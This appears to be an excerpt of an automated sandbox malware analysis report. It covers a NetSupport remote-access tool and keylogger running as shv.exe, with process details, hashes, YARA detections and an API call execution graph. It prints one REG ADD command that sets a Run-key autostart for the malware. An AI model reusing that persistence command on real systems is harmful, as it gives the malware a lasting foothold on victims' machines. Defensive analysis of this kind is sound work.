                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Netstat\shv.exe
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000000.1680595805.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4133041129.000000006CDB0000.00000002.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\Public\Netstat\shv.exe, Author: Joe Security
                                                                                      Antivirus matches:
                                                                                      • Detection: 29%, ReversingLabs
                                                                                      Reputation:moderate
                                                                                      Has exited:false

                                                                                      Target ID:6
                                                                                      Start time:08:58:02
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff700300000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:7
                                                                                      Start time:08:58:03
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Windows\System32\reg.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:REG ADD "HKCU\SOFTWARE\Software\Supservice\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0x7ff700300000
                                                                                      File size:77'312 bytes
                                                                                      MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:8
                                                                                      Start time:08:58:03
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:C:\Users\Public\Netstat\shv.exe
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000000.1691809237.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1694138825.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1694399599.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000008.00000002.1694438358.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      Reputation:moderate
                                                                                      Has exited:true

                                                                                      Target ID:9
                                                                                      Start time:08:58:14
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1806388208.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1805359841.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000002.1806208659.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000009.00000000.1802595368.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      Has exited:true

                                                                                      Target ID:11
                                                                                      Start time:08:58:23
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1886663530.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000000.1884540195.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1886119575.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000B.00000002.1886628907.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      Has exited:true

                                                                                      Target ID:14
                                                                                      Start time:08:58:31
                                                                                      Start date:25/11/2024
                                                                                      Path:C:\Users\Public\Netstat\shv.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\Public\Netstat\shv.exe"
                                                                                      Imagebase:0xf00000
                                                                                      File size:105'848 bytes
                                                                                      MD5 hash:8D9709FF7D9C83BD376E01912C734F0A
                                                                                      Has elevated privileges:false
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.1968165061.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000000.1965850134.0000000000F02000.00000002.00000001.01000000.00000009.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.1968482175.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 0000000E.00000002.1968430156.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                      Has exited:true

                                                                                        Execution Graph

                                                                                        Execution Coverage:12.1%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:26.6%
                                                                                        Total number of Nodes:2000
                                                                                        Total number of Limit Nodes:25
26470->26472 26491 7ff6fe1962dc GetCurrentDirectoryW 26471->26491 26474 7ff6fe19e755 GetCurrentProcessId AttachConsole 26472->26474 26490 7ff6fe19e6fb 26472->26490 26473->26464 26477 7ff6fe19e76c 26474->26477 26475->26464 26479 7ff6fe19e6a5 26476->26479 26483 7ff6fe19e778 GetStdHandle WriteConsoleW Sleep FreeConsole 26477->26483 26482 7ff6fe19da98 48 API calls 26479->26482 26480->26448 26480->26449 26481 7ff6fe19e7b9 ExitProcess 26484 7ff6fe19e6c3 26482->26484 26483->26490 26485 7ff6fe19aae0 48 API calls 26484->26485 26486 7ff6fe19e6ce 26485->26486 26617 7ff6fe19dc2c 33 API calls 26486->26617 26488 7ff6fe19e6da 26618 7ff6fe1819e0 31 API calls _invalid_parameter_noinfo_noreturn 26488->26618 26619 7ff6fe1819e0 31 API calls _invalid_parameter_noinfo_noreturn 26490->26619 26492 7ff6fe196300 26491->26492 26497 7ff6fe19638d 26491->26497 26493 7ff6fe1813a4 33 API calls 26492->26493 26494 7ff6fe19631b GetCurrentDirectoryW 26493->26494 26495 7ff6fe196341 26494->26495 26736 7ff6fe1820b0 26495->26736 26497->26267 26498 7ff6fe19634f 26498->26497 26499 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26498->26499 26500 7ff6fe1963a9 26499->26500 26502 7ff6fe19dd88 26501->26502 26503 7ff6fe1a9481 OleInitialize 26502->26503 26504 7ff6fe1a94a7 26503->26504 26505 7ff6fe1a94cd SHGetMalloc 26504->26505 26505->26269 26507 7ff6fe1a9a49 26506->26507 26509 7ff6fe1a9a4e memcpy_s 26506->26509 26508 7ff6fe181fa0 31 API calls 26507->26508 26508->26509 26510 7ff6fe181fa0 31 API calls 26509->26510 26512 7ff6fe1a9a7d memcpy_s 26509->26512 26510->26512 26511 7ff6fe181fa0 31 API calls 26513 7ff6fe1a9aac memcpy_s 26511->26513 26512->26511 26512->26513 26514 7ff6fe181fa0 31 API calls 26513->26514 26515 7ff6fe1a9adb memcpy_s 26513->26515 26514->26515 26515->26277 26517 7ff6fe1813a4 33 API calls 26516->26517 26518 7ff6fe196489 26517->26518 26519 7ff6fe19648c GetModuleFileNameW 26518->26519 26522 7ff6fe1964dc 26518->26522 26520 7ff6fe1964de 26519->26520 26521 7ff6fe1964a7 26519->26521 
26520->26522 26521->26518 26523 7ff6fe18129c 33 API calls 26522->26523 26525 7ff6fe196506 26523->26525 26524 7ff6fe19653e 26524->26280 26525->26524 26526 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26525->26526 26527 7ff6fe196560 26526->26527 26529 7ff6fe193e4d swprintf 26528->26529 26530 7ff6fe1b9ef0 swprintf 46 API calls 26529->26530 26531 7ff6fe193e69 SetEnvironmentVariableW GetModuleHandleW LoadIconW 26530->26531 26532 7ff6fe1ab014 LoadBitmapW 26531->26532 26533 7ff6fe1ab03e 26532->26533 26534 7ff6fe1ab046 26532->26534 26741 7ff6fe1a8624 FindResourceW 26533->26741 26535 7ff6fe1ab04e GetObjectW 26534->26535 26536 7ff6fe1ab063 26534->26536 26535->26536 26756 7ff6fe1a849c 26536->26756 26540 7ff6fe1ab0ce 26551 7ff6fe1998ac 26540->26551 26541 7ff6fe1ab09e 26761 7ff6fe1a8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26541->26761 26542 7ff6fe1a8624 11 API calls 26544 7ff6fe1ab08a 26542->26544 26544->26541 26546 7ff6fe1ab092 DeleteObject 26544->26546 26545 7ff6fe1ab0a7 26762 7ff6fe1a84cc 26545->26762 26546->26541 26550 7ff6fe1ab0bf DeleteObject 26550->26540 26769 7ff6fe1998dc 26551->26769 26553 7ff6fe1998ba 26836 7ff6fe19a43c GetModuleHandleW FindResourceW 26553->26836 26555 7ff6fe1998c2 26555->26303 26557 7ff6fe1b21d0 33 API calls 26556->26557 26558 7ff6fe1a67fa 26557->26558 26558->26313 26560 7ff6fe1a9501 26559->26560 26561 7ff6fe1a950a OleUninitialize 26560->26561 26562 7ff6fe1ee330 26561->26562 26564 7ff6fe18139b 26563->26564 26565 7ff6fe1812d0 26563->26565 26919 7ff6fe182004 33 API calls std::_Xinvalid_argument 26564->26919 26568 7ff6fe181338 26565->26568 26569 7ff6fe181396 26565->26569 26572 7ff6fe1812de memcpy_s 26565->26572 26571 7ff6fe1b21d0 33 API calls 26568->26571 26568->26572 26918 7ff6fe181f80 33 API calls 3 library calls 26569->26918 26571->26572 26572->26284 26573->26292 26574->26309 26575->26314 26576->26318 26577->26324 26578->26311 26579->26325 26580->26335 26582 7ff6fe19dff4 GetModuleHandleW 26581->26582 26582->26417 26582->26418 
26584 7ff6fe197e0c 26583->26584 26585 7ff6fe197e23 26584->26585 26586 7ff6fe197e55 26584->26586 26588 7ff6fe18129c 33 API calls 26585->26588 26621 7ff6fe18704c 47 API calls memcpy_s 26586->26621 26590 7ff6fe197e47 26588->26590 26589 7ff6fe197e5a 26590->26454 26592 7ff6fe1951c8 GetVersionExW 26591->26592 26593 7ff6fe1951fb 26591->26593 26592->26593 26594 7ff6fe1b2320 _handle_error 8 API calls 26593->26594 26595 7ff6fe195228 26594->26595 26595->26454 26597 7ff6fe1980a5 26596->26597 26622 7ff6fe198188 26597->26622 26599 7ff6fe1980ca 26599->26454 26601 7ff6fe1932e4 26600->26601 26602 7ff6fe1932e7 GetFileAttributesW 26600->26602 26601->26602 26603 7ff6fe1932f8 26602->26603 26610 7ff6fe193375 26602->26610 26631 7ff6fe196a0c 26603->26631 26604 7ff6fe1b2320 _handle_error 8 API calls 26606 7ff6fe193389 26604->26606 26606->26454 26608 7ff6fe193323 GetFileAttributesW 26609 7ff6fe19333c 26608->26609 26609->26610 26611 7ff6fe193399 26609->26611 26610->26604 26612 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26611->26612 26613 7ff6fe19339e 26612->26613 26614->26425 26615->26447 26616->26456 26617->26488 26618->26490 26619->26481 26620->26440 26621->26589 26623 7ff6fe198326 26622->26623 26626 7ff6fe1981ba 26622->26626 26630 7ff6fe18704c 47 API calls memcpy_s 26623->26630 26625 7ff6fe19832b 26627 7ff6fe1981d4 memcpy_s 26626->26627 26629 7ff6fe1958a4 33 API calls 2 library calls 26626->26629 26627->26599 26629->26627 26630->26625 26632 7ff6fe196a4b 26631->26632 26651 7ff6fe196a44 26631->26651 26634 7ff6fe18129c 33 API calls 26632->26634 26633 7ff6fe1b2320 _handle_error 8 API calls 26635 7ff6fe19331f 26633->26635 26636 7ff6fe196a76 26634->26636 26635->26608 26635->26609 26637 7ff6fe196a96 26636->26637 26638 7ff6fe196cc7 26636->26638 26640 7ff6fe196ab0 26637->26640 26663 7ff6fe196b49 26637->26663 26639 7ff6fe1962dc 35 API calls 26638->26639 26644 7ff6fe196ce6 26639->26644 26641 7ff6fe1970ab 26640->26641 26704 7ff6fe18c098 33 API calls 2 library calls 26640->26704 
26728 7ff6fe182004 33 API calls std::_Xinvalid_argument 26641->26728 26643 7ff6fe196eef 26647 7ff6fe1970cf 26643->26647 26725 7ff6fe18c098 33 API calls 2 library calls 26643->26725 26644->26643 26648 7ff6fe196d1b 26644->26648 26702 7ff6fe196b44 26644->26702 26645 7ff6fe1970b1 26655 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26645->26655 26731 7ff6fe182004 33 API calls std::_Xinvalid_argument 26647->26731 26654 7ff6fe1970bd 26648->26654 26707 7ff6fe18c098 33 API calls 2 library calls 26648->26707 26649 7ff6fe1970d5 26656 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26649->26656 26651->26633 26652 7ff6fe196b03 26664 7ff6fe181fa0 31 API calls 26652->26664 26670 7ff6fe196b15 memcpy_s 26652->26670 26729 7ff6fe182004 33 API calls std::_Xinvalid_argument 26654->26729 26661 7ff6fe1970b7 26655->26661 26662 7ff6fe1970db 26656->26662 26657 7ff6fe1970a6 26668 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26657->26668 26658 7ff6fe196f56 26726 7ff6fe1811cc 33 API calls memcpy_s 26658->26726 26672 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26661->26672 26674 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26662->26674 26669 7ff6fe18129c 33 API calls 26663->26669 26663->26702 26664->26670 26666 7ff6fe1970c3 26677 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26666->26677 26667 7ff6fe181fa0 31 API calls 26667->26702 26668->26641 26675 7ff6fe196bbe 26669->26675 26670->26667 26671 7ff6fe196f69 26727 7ff6fe1957ac 33 API calls memcpy_s 26671->26727 26672->26654 26673 7ff6fe181fa0 31 API calls 26687 7ff6fe196df5 26673->26687 26679 7ff6fe1970e1 26674->26679 26705 7ff6fe195820 33 API calls 26675->26705 26681 7ff6fe1970c9 26677->26681 26678 7ff6fe196d76 memcpy_s 26678->26666 26678->26673 26730 7ff6fe18704c 47 API calls memcpy_s 26681->26730 26682 7ff6fe196bd3 26706 7ff6fe18e164 33 API calls 2 library calls 26682->26706 26684 7ff6fe181fa0 31 API calls 26686 7ff6fe196fec 26684->26686 26689 
7ff6fe181fa0 31 API calls 26686->26689 26693 7ff6fe196e21 26687->26693 26708 7ff6fe181744 26687->26708 26688 7ff6fe196f79 memcpy_s 26688->26662 26688->26684 26692 7ff6fe196ff6 26689->26692 26691 7ff6fe181fa0 31 API calls 26695 7ff6fe196c6d 26691->26695 26696 7ff6fe181fa0 31 API calls 26692->26696 26693->26681 26697 7ff6fe18129c 33 API calls 26693->26697 26694 7ff6fe196be9 memcpy_s 26694->26661 26694->26691 26699 7ff6fe181fa0 31 API calls 26695->26699 26696->26702 26698 7ff6fe196ec2 26697->26698 26721 7ff6fe182034 26698->26721 26699->26702 26701 7ff6fe196edf 26703 7ff6fe181fa0 31 API calls 26701->26703 26702->26645 26702->26649 26702->26651 26702->26657 26703->26702 26704->26652 26705->26682 26706->26694 26707->26678 26711 7ff6fe181784 26708->26711 26720 7ff6fe1818a1 26708->26720 26710 7ff6fe1818a7 26733 7ff6fe181f80 33 API calls 3 library calls 26710->26733 26711->26710 26715 7ff6fe1b21d0 33 API calls 26711->26715 26717 7ff6fe1817ac memcpy_s 26711->26717 26713 7ff6fe1818ad 26734 7ff6fe1b354c 31 API calls __std_exception_copy 26713->26734 26715->26717 26716 7ff6fe181859 memcpy_s 26716->26693 26717->26716 26719 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26717->26719 26718 7ff6fe1818d9 26718->26693 26719->26720 26732 7ff6fe182004 33 API calls std::_Xinvalid_argument 26720->26732 26722 7ff6fe182085 26721->26722 26724 7ff6fe182059 memcpy_s 26721->26724 26735 7ff6fe1815b8 33 API calls 3 library calls 26722->26735 26724->26701 26725->26658 26726->26671 26727->26688 26730->26647 26733->26713 26734->26718 26735->26724 26737 7ff6fe1820f6 26736->26737 26739 7ff6fe1820cb memcpy_s 26736->26739 26740 7ff6fe181474 33 API calls 3 library calls 26737->26740 26739->26498 26740->26739 26742 7ff6fe1a864f SizeofResource 26741->26742 26747 7ff6fe1a879b 26741->26747 26743 7ff6fe1a8669 LoadResource 26742->26743 26742->26747 26744 7ff6fe1a8682 LockResource 26743->26744 26743->26747 26745 7ff6fe1a8697 GlobalAlloc 26744->26745 26744->26747 26746 7ff6fe1a86b8 GlobalLock 
26745->26746 26745->26747 26748 7ff6fe1a8792 GlobalFree 26746->26748 26749 7ff6fe1a86ca memcpy_s 26746->26749 26747->26534 26748->26747 26750 7ff6fe1a86d8 CreateStreamOnHGlobal 26749->26750 26751 7ff6fe1a8789 GlobalUnlock 26750->26751 26752 7ff6fe1a86f6 GdipAlloc 26750->26752 26751->26748 26753 7ff6fe1a870b 26752->26753 26753->26751 26754 7ff6fe1a8772 26753->26754 26755 7ff6fe1a875a GdipCreateHBITMAPFromBitmap 26753->26755 26754->26751 26755->26754 26757 7ff6fe1a84cc 4 API calls 26756->26757 26758 7ff6fe1a84aa 26757->26758 26760 7ff6fe1a84b9 26758->26760 26767 7ff6fe1a8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26758->26767 26760->26540 26760->26541 26760->26542 26761->26545 26763 7ff6fe1a84de 26762->26763 26764 7ff6fe1a84e3 26762->26764 26768 7ff6fe1a8590 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 26763->26768 26766 7ff6fe1a8df4 16 API calls _handle_error 26764->26766 26766->26550 26767->26760 26768->26764 26772 7ff6fe1998fe _snwprintf 26769->26772 26770 7ff6fe199973 26887 7ff6fe1968b0 48 API calls 26770->26887 26772->26770 26773 7ff6fe199a89 26772->26773 26776 7ff6fe1999fd 26773->26776 26779 7ff6fe1820b0 33 API calls 26773->26779 26774 7ff6fe181fa0 31 API calls 26774->26776 26775 7ff6fe19997d memcpy_s 26775->26774 26777 7ff6fe19a42e 26775->26777 26838 7ff6fe1924c0 26776->26838 26778 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26777->26778 26780 7ff6fe19a434 26778->26780 26779->26776 26783 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26780->26783 26785 7ff6fe19a43a 26783->26785 26784 7ff6fe199a22 26786 7ff6fe19204c 100 API calls 26784->26786 26788 7ff6fe199a2b 26786->26788 26787 7ff6fe199b17 26856 7ff6fe1ba450 26787->26856 26788->26780 26790 7ff6fe199a66 26788->26790 26794 7ff6fe1b2320 _handle_error 8 API calls 26790->26794 26791 7ff6fe199aad 26791->26787 26795 7ff6fe198e58 33 API calls 26791->26795 26793 7ff6fe1ba450 31 API calls 26807 7ff6fe199b57 __vcrt_FlsAlloc 26793->26807 26796 7ff6fe19a40e 26794->26796 26795->26791 
26796->26553 26797 7ff6fe199c89 26798 7ff6fe192aa0 101 API calls 26797->26798 26810 7ff6fe199d5c 26797->26810 26801 7ff6fe199ca1 26798->26801 26802 7ff6fe1928d0 104 API calls 26801->26802 26801->26810 26808 7ff6fe199cc9 26802->26808 26807->26797 26807->26810 26864 7ff6fe192bb0 26807->26864 26873 7ff6fe1928d0 26807->26873 26878 7ff6fe192aa0 26807->26878 26808->26810 26830 7ff6fe199cd7 __vcrt_FlsAlloc 26808->26830 26888 7ff6fe1a0bbc MultiByteToWideChar 26808->26888 26883 7ff6fe19204c 26810->26883 26811 7ff6fe19a1ec 26827 7ff6fe19a2c2 26811->26827 26894 7ff6fe1bcf90 31 API calls 2 library calls 26811->26894 26813 7ff6fe19a157 26813->26811 26891 7ff6fe1bcf90 31 API calls 2 library calls 26813->26891 26814 7ff6fe19a14b 26814->26553 26817 7ff6fe19a2ae 26817->26827 26896 7ff6fe198cd0 33 API calls 2 library calls 26817->26896 26818 7ff6fe19a3a2 26820 7ff6fe1ba450 31 API calls 26818->26820 26819 7ff6fe19a249 26895 7ff6fe1bb7bc 31 API calls _invalid_parameter_noinfo_noreturn 26819->26895 26822 7ff6fe19a3cb 26820->26822 26825 7ff6fe1ba450 31 API calls 26822->26825 26823 7ff6fe198e58 33 API calls 26823->26827 26824 7ff6fe19a16d 26892 7ff6fe1bb7bc 31 API calls _invalid_parameter_noinfo_noreturn 26824->26892 26825->26810 26827->26818 26827->26823 26828 7ff6fe19a1d8 26828->26811 26893 7ff6fe198cd0 33 API calls 2 library calls 26828->26893 26830->26810 26830->26811 26830->26813 26830->26814 26831 7ff6fe19a429 26830->26831 26832 7ff6fe1a0f68 WideCharToMultiByte 26830->26832 26889 7ff6fe19aa88 45 API calls 2 library calls 26830->26889 26890 7ff6fe1ba270 31 API calls 2 library calls 26830->26890 26897 7ff6fe1b2624 8 API calls 26831->26897 26832->26830 26837 7ff6fe19a468 26836->26837 26837->26555 26839 7ff6fe1924fd CreateFileW 26838->26839 26841 7ff6fe1925ae GetLastError 26839->26841 26849 7ff6fe19266e 26839->26849 26842 7ff6fe196a0c 49 API calls 26841->26842 26843 7ff6fe1925dc 26842->26843 26844 7ff6fe1925e0 CreateFileW GetLastError 26843->26844 26850 7ff6fe19262c 26843->26850 
26844->26850 26845 7ff6fe1926b1 SetFileTime 26848 7ff6fe1926cf 26845->26848 26846 7ff6fe192708 26847 7ff6fe1b2320 _handle_error 8 API calls 26846->26847 26851 7ff6fe19271b 26847->26851 26848->26846 26852 7ff6fe1820b0 33 API calls 26848->26852 26849->26845 26849->26848 26850->26849 26853 7ff6fe192736 26850->26853 26851->26784 26851->26791 26852->26846 26854 7ff6fe1b7904 _invalid_parameter_noinfo_noreturn 31 API calls 26853->26854 26855 7ff6fe19273b 26854->26855 26857 7ff6fe1ba47d 26856->26857 26863 7ff6fe1ba492 26857->26863 26898 7ff6fe1bd69c 15 API calls memcpy_s 26857->26898 26859 7ff6fe1ba487 26899 7ff6fe1b78e4 31 API calls _invalid_parameter_noinfo 26859->26899 26861 7ff6fe1b2320 _handle_error 8 API calls 26862 7ff6fe199b37 26861->26862 26862->26793 26863->26861 26865 7ff6fe192bcd 26864->26865 26868 7ff6fe192be9 26864->26868 26870 7ff6fe192bfb 26865->26870 26900 7ff6fe18b9c4 99 API calls std::_Xinvalid_argument 26865->26900 26867 7ff6fe192c01 SetFilePointer 26869 7ff6fe192c1e GetLastError 26867->26869 26867->26870 26868->26867 26868->26870 26869->26870 26871 7ff6fe192c28 26869->26871 26870->26807 26871->26870 26901 7ff6fe18b9c4 99 API calls std::_Xinvalid_argument 26871->26901 26874 7ff6fe1928fd 26873->26874 26876 7ff6fe1928f6 26873->26876 26875 7ff6fe192320 GetStdHandle ReadFile GetLastError GetLastError GetFileType 26874->26875 26874->26876 26902 7ff6fe18b8a4 99 API calls std::_Xinvalid_argument 26874->26902 26875->26874 26876->26807 26903 7ff6fe192778 26878->26903 26881 7ff6fe192ac7 26881->26807 26884 7ff6fe192066 26883->26884 26886 7ff6fe192072 26883->26886 26884->26886 26911 7ff6fe1920d0 26884->26911 26887->26775 26888->26830 26889->26830 26890->26830 26891->26824 26892->26828 26893->26811 26894->26819 26895->26817 26896->26827 26897->26777 26898->26859 26899->26863 26909 7ff6fe192789 _snwprintf 26903->26909 26904 7ff6fe1927b5 26906 7ff6fe1b2320 _handle_error 8 API calls 26904->26906 26905 7ff6fe192890 SetFilePointer 26905->26904 26908 7ff6fe1928b8 
GetLastError 26905->26908 26907 7ff6fe19281d 26906->26907 26907->26881 26910 7ff6fe18b9c4 99 API calls std::_Xinvalid_argument 26907->26910 26908->26904 26909->26904 26909->26905 26912 7ff6fe192102 26911->26912 26913 7ff6fe1920ea 26911->26913 26914 7ff6fe192126 26912->26914 26917 7ff6fe18b544 99 API calls 26912->26917 26913->26912 26915 7ff6fe1920f6 CloseHandle 26913->26915 26914->26886 26915->26912 26917->26914 26918->26564 29014 7ff6fe1bd94c 29015 7ff6fe1bd997 29014->29015 29016 7ff6fe1bd95b abort 29014->29016 29021 7ff6fe1bd69c 15 API calls memcpy_s 29015->29021 29016->29015 29018 7ff6fe1bd97e HeapAlloc 29016->29018 29020 7ff6fe1bbbc0 abort 2 API calls 29016->29020 29018->29016 29019 7ff6fe1bd995 29018->29019 29020->29016 29021->29019 29023 7ff6fe1b154b 29024 7ff6fe1b14a2 29023->29024 29025 7ff6fe1b1900 _com_raise_error 14 API calls 29024->29025 29025->29024 26939 7ff6fe1b1278 26940 7ff6fe1b1900 _com_raise_error 14 API calls 26939->26940 26941 7ff6fe1b12b7 26940->26941 26941->26941 26948 7ff6fe1ab190 27291 7ff6fe18255c 26948->27291 26950 7ff6fe1ab1db 26951 7ff6fe1ab1ef 26950->26951 26952 7ff6fe1abe93 26950->26952 27001 7ff6fe1ab20c 26950->27001 26954 7ff6fe1ab1ff 26951->26954 26955 7ff6fe1ab2db 26951->26955 26951->27001 27570 7ff6fe1af390 26952->27570 26960 7ff6fe1ab2a9 26954->26960 26961 7ff6fe1ab207 26954->26961 26963 7ff6fe1ab391 26955->26963 26968 7ff6fe1ab2f5 26955->26968 26956 7ff6fe1b2320 _handle_error 8 API calls 26962 7ff6fe1ac350 26956->26962 26958 7ff6fe1abec9 26965 7ff6fe1abef0 GetDlgItem 